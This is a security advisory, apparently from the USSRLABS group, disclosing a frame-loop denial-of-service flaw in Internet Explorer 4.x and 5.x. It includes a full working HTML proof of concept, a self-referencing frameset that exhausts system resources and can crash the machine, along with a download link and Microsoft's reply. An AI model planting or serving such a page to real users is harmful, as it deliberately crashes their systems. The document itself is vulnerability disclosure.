u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h

Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability

Microsoft Internet Explorer 4.x Microsoft Internet Explorer 5.x	Frame Loop Vulnerability
	PROBLEM: It is possible to create a malicious webpage that when visited by an IE user all of their system resources are devoured and depending on the system its possible that the machine can even crash and reboot itself. The reason you can use up all of the client's resources is by creating an endless loop of frames. You create a html file that has a few frames inside it and then link those frames back to the same html file so every time IE loads the new frame it loads another new frame and another etc... Until after a short time your resources are all used up and your system crashes. We understand this is somewhat of a nuisance hole but still something that needs to be addressed. Example: -----------readme.htm------------ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <head> <title>Ussrlabs is getting hard</title> </head> <frameset framespacing="2" frameborder="no" rows="65,"> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize> <noframes> <body bgcolor="#FFFFFF"> <p>This web page uses frames, but your browser doesn't support them.</p> </body> </noframes> </frameset> <frameset> <noframes> </noframes> </frameset> </html> -----------readme.htm------------ Or if you want the html can be downloaded here. http://www.ussrback.com/iehole/readme.zip Note:* It also affect Microsoft FrontPage. Vendor Status: Contacted. "We talked to MS and they said this is a nuisance attack and do not think its a security hole. So you will not be getting a patch for this(maybe). However, it is good to know that Netscape Navigator is not affected by this hole." Vendor Url: http://www.microsoft.com/ Program Url: http://www.microsoft.com/windows/ie/default.htm Credit: USSRLABS SOLUTION: Nothing yet. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h WWW.USSRBACK.COM

Go Ussrback Home